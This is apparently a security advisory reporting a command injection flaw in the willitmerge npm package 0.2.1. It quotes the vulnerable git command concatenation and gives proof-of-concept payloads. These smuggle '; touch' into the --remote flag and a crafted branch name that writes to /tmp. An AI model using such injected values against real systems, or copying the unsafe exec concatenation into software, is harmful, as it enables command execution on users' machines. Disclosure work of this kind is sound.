willitmerge describes itself as a command line tool to check if pull requests are mergeable. There is a Command Injection vulnerability in version willitmerge@0.2.1. Resources:

• Project's GitHub source code: https://github.com/shama/willitmerge/
• Project's npm package: https://www.npmjs.com/package/willitmerge

Background on exploitation

Reporting a Command Injection vulnerability in willitmerge npm package. A security vulnerability manifests in this package due to the use of insecure child process execution API (exec) to which it concateanes user input, whether provided to the command-line flag, or is in user control in the target repository.

Exploit

POC 1

1. Install willitmerge
2. Run it with the following command sh willitmerge --verbose --remote "https://github.com/lirantal/npq.git; touch /tmp/hel"
3. Confirm the file /tmp/hel is created on disk

GitHub-sourced attack vector

Lines 189-197 in lib/willitmerge.js pass user input controlled by repository collaborators into the git command:

  var cmds = [
    'git checkout -b ' + branch + ' ' + that.options.remote + '/' + iss.base.ref,
    'git remote add ' + branch + ' ' + gitUrl,
    'git pull ' + branch + ' ' + iss.head.ref,
    'git reset --merge HEAD',
    'git checkout ' + origBranch,
    'git branch -D ' + branch,
    'git remote rm ' + branch
  ];

Users creating malicious branch names such as ;{echo,hello,world}>/tmp/c This is a similar attack vector to that which was reported for the [pullit vulnerability (https://security.snyk.io/vuln/npm:pullit:20180214)

Author

Liran Tal